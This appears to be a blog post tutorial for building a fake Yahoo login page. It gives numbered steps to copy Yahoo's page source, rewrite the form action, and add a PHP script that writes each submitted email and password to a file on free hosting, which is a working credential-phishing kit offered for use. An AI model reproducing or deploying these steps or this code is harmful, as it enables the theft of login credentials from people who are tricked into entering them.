Create Fake Login Page For Yahoo






1.First go to Yahoo’s login page “https://login.yahoo.com/config/login_verify2?&.src=ym”

2.Right click on the page and go to “View Page Source”.


3.You will see the whole HTML coding in it of the page(Huge huh ?).

4.Then select the whole HTML by pressing CTRL+A and copy it by pressing CTRL+C

5.Open a ‘Text document’ or ‘Notepad’ and paste the Copied contents into it and the save it as ‘Yahoo.htm’

6.Then you have to make a login.php file.For that, open another text document and paste the
following HTML code in it

<?php /* Created on: 3/27/2011 */
$fp = fopen(“YahooPasswords.htm”, “a”);
fwrite($fp, “Email:$_POST[ID name="***"]\tPassword:$_POST[PASS name="***"]“);
echo “<HTML>

<head>
<title>earnandtips</title>

<FRAMESET cols=\”*\”>

<FRAME SRC=\”http://www.earnandtips.blogspot.com\”>


</FRAMESET>”;?>

In this Code Change only the following ie. if you want to change it

a.”YahooPasswords.htm”

b.”<title>Earnandtips<title/>”

c.”http://www.earnandtips.blogspot.com\” but don’t forget ‘\’ after the destined URL.

d.”3/27/2011″

e.”Email:” & “Password:”


7.Then save this document as ‘Login.php’.

8.Now to got to ‘Yahoo.htm’ and find (CTRL+F) ‘action’.

9.You will find something that likes like this action=”https://login.yahoo.com/config/login?” .


10.Change it to action=”/login.php”

12.Now find ‘Yahoo! ID’ and in the next line or near it you will find name=”login” (see closely)

So,here the id is ‘username’.(if ‘id’ does not exist then take the id=”**” or make a name=’**’ ,it is always there in
in yahoo)

13.Now, go back to login.php and replace ID name=”***” with ‘login’ (since name=’login’)




14.Find ‘Password’ and in the next line you will find name=’passwd’.So the name is ‘passwd’.Replace it with PASS name=’passwd’ with ‘passwd’


NOTE: Do not include ‘ in login.php.For example Email:$_POST[login

15.Save both the files.




16.Upload them into any free hosting website like t35.com.Do not upload them into a directory!

17.Then to test it just type in some usename and password.

18.Refresh the control panel (the place where you uploaded the files) and them you will find
‘YahooPasswords.htm’ which is created and when you open it you will find the username and password that you entered.

Share/Bookmark

No comments:

Post a Comment

Related Posts Plugin for WordPress, Blogger...